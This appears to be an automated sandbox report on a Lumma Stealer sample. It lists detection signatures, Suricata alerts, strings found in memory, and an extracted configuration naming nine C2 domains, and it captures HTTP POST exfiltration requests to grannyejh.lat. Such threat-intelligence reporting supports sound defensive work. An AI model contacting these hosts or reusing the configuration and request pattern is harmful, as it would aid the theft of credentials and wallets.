
Windows Analysis Report
pPizCGDvrx.exe

Overview

General Information

Sample name: pPizCGDvrx.exe (renamed because original name is a hash value)
Original sample name: 604fc7ac851c76b3ade50108357d8134.exe
Analysis ID: 1577892
MD5: 604fc7ac851c76b3ade50108357d8134
SHA1: e8e5229df293646aed1a46d5a7d7983eb1f2eb47
SHA256: a16f254d7b7ede78b181d541cf02de244472f59f18ea3c8e6ef63d869736cb93
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • pPizCGDvrx.exe (PID: 7392 cmdline: "C:\Users\user\Desktop\pPizCGDvrx.exe" MD5: 604FC7AC851C76B3ADE50108357D8134)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Extracted malware configuration (LummaC): {"C2 url": ["energyaffai.lat", "aspecteirs.lat", "rapeflowwj.lat", "discokeyus.lat", "necklacebudi.lat", "sweepyribs.lat", "sustainskelet.lat", "grannyejh.lat", "crosshuaht.lat"], "Build id": "PsFKDg--pablo"}
Yara matches

Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
00000000.00000003.1600613999.00000000011B1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.1603193401.000000000115A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.1603110801.0000000001158000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: pPizCGDvrx.exe PID: 7392 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: pPizCGDvrx.exe PID: 7392 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
No Sigma rule has matched
Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T21:17:02.473914+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49700 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:06.952490+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49702 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:14.417710+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49723 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:19.368228+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49735 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:25.397542+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49754 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:30.868317+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49765 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:36.349023+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49781 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:44.738101+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49802 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:05.699877+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49700 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:12.833580+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49702 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:05.699877+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49700 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:12.833580+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.7 | 49702 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:02.473914+0100 | 2058365 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49700 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:06.952490+0100 | 2058365 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49702 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:14.417710+0100 | 2058365 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49723 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:19.368228+0100 | 2058365 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49735 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:25.397542+0100 | 2058365 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49754 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:30.868317+0100 | 2058365 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49765 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:36.349023+0100 | 2058365 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49781 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:44.738101+0100 | 2058365 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49802 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:00.944390+0100 | 2058364 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 64619 | 1.1.1.1 | 53 | UDP
2024-12-18T21:17:00.797972+0100 | 2058378 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 64749 | 1.1.1.1 | 53 | UDP
2024-12-18T21:17:17.614166+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49723 | 172.67.179.109 | 443 | TCP

AV Detection

Source: pPizCGDvrx.exe | Avira: detected
Source: https://grannyejh.lat/H | Avira URL Cloud: Label: malware
Source: https://grannyejh.lat:443/apitA | Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/s | Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/? | Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/apiz0y | Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/apigsA | Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/= | Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/apiz | Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/P | Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/apiG | Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/api6 | Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/( | Avira URL Cloud: Label: malware
Source: pPizCGDvrx.exe.7392.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["energyaffai.lat", "aspecteirs.lat", "rapeflowwj.lat", "discokeyus.lat", "necklacebudi.lat", "sweepyribs.lat", "sustainskelet.lat", "grannyejh.lat", "crosshuaht.lat"], "Build id": "PsFKDg--pablo"}
Source: pPizCGDvrx.exe | ReversingLabs: Detection: 57%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: pPizCGDvrx.exe | Joe Sandbox ML: detected
Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmp | String decryptor: rapeflowwj.lat
Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmp | String decryptor: crosshuaht.lat
Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmp | String decryptor: sustainskelet.lat
Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmp | String decryptor: aspecteirs.lat
Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmp | String decryptor: energyaffai.lat
Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmp | String decryptor: necklacebudi.lat
Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmp | String decryptor: discokeyus.lat
Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmp | String decryptor: grannyejh.lat
Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmp | String decryptor: sweepyribs.lat
Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmp | String decryptor: PsFKDg--pablo
Source: pPizCGDvrx.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49754 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49765 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49781 version: TLS 1.2
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Directory queried: number of queries: 1001

Networking

Source: Network traffic | Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.7:64619 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.7:64749 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.7:49723 -> 172.67.179.109:443
Source: Network traffic | Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.7:49700 -> 172.67.179.109:443
Source: Network traffic | Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.7:49702 -> 172.67.179.109:443
Source: Network traffic | Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.7:49802 -> 172.67.179.109:443
Source: Network traffic | Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.7:49754 -> 172.67.179.109:443
Source: Network traffic | Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.7:49735 -> 172.67.179.109:443
Source: Network traffic | Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.7:49765 -> 172.67.179.109:443
Source: Network traffic | Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.7:49781 -> 172.67.179.109:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49723 -> 172.67.179.109:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49700 -> 172.67.179.109:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49702 -> 172.67.179.109:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49702 -> 172.67.179.109:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 172.67.179.109:443
Source: Malware configuration extractor | URLs: energyaffai.lat
Source: Malware configuration extractor | URLs: aspecteirs.lat
Source: Malware configuration extractor | URLs: rapeflowwj.lat
Source: Malware configuration extractor | URLs: discokeyus.lat
Source: Malware configuration extractor | URLs: necklacebudi.lat
Source: Malware configuration extractor | URLs: sweepyribs.lat
Source: Malware configuration extractor | URLs: sustainskelet.lat
Source: Malware configuration extractor | URLs: grannyejh.lat
Source: Malware configuration extractor | URLs: crosshuaht.lat
Source: Joe Sandbox View | IP Address: 172.67.179.109 172.67.179.109
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 172.67.179.109:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49723 -> 172.67.179.109:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49802 -> 172.67.179.109:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49765 -> 172.67.179.109:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49754 -> 172.67.179.109:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49735 -> 172.67.179.109:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 172.67.179.109:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49781 -> 172.67.179.109:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: grannyejh.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 47
    Host: grannyejh.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=QIX7HBIA1S9Y5Q48LYY
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12850
    Host: grannyejh.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=XGGIGRETO6J
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15034
    Host: grannyejh.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=0PD9BVQSDHL2J
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20371
    Host: grannyejh.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=2ODPF2AH7FW6G
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1206
    Host: grannyejh.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=BHT4KAL6C4
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 551069
    Host: grannyejh.lat
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: sweepyribs.lat
Source: global traffic | DNS traffic detected: DNS query: grannyejh.lat
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: grannyejh.lat
Source: pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: pPizCGDvrx.exe, 00000000.00000003.1437780478.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1755166641.00000000011A9000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1600613999.000000000119E000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1657908110.000000000119E000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1755109523.000000000119E000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1603058003.00000000011A0000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1754892767.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001158000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: pPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: pPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: pPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: pPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: pPizCGDvrx.exe, pPizCGDvrx.exe, 00000000.00000003.1437780478.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1658536617.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1600613999.00000000011B1000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756651174.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1671282369.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1754833970.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1603018790.00000000011C2000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756690646.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1600571554.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1657853722.00000000011C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grannyejh.lat/
Source: pPizCGDvrx.exe, 00000000.00000003.1437659594.000000000114B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grannyejh.lat/(
Source: pPizCGDvrx.exe, 00000000.00000003.1657853722.00000000011C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grannyejh.lat/=
Source: pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001143000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grannyejh.lat/?
Source: pPizCGDvrx.exe, 00000000.00000003.1547189267.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1671204983.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756690646.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1546879090.00000000011EC000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1600571554.00000000011E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grannyejh.lat/H
Source: pPizCGDvrx.exe, 00000000.00000003.1658536617.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756651174.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1671282369.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1754833970.00000000011C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grannyejh.lat/P
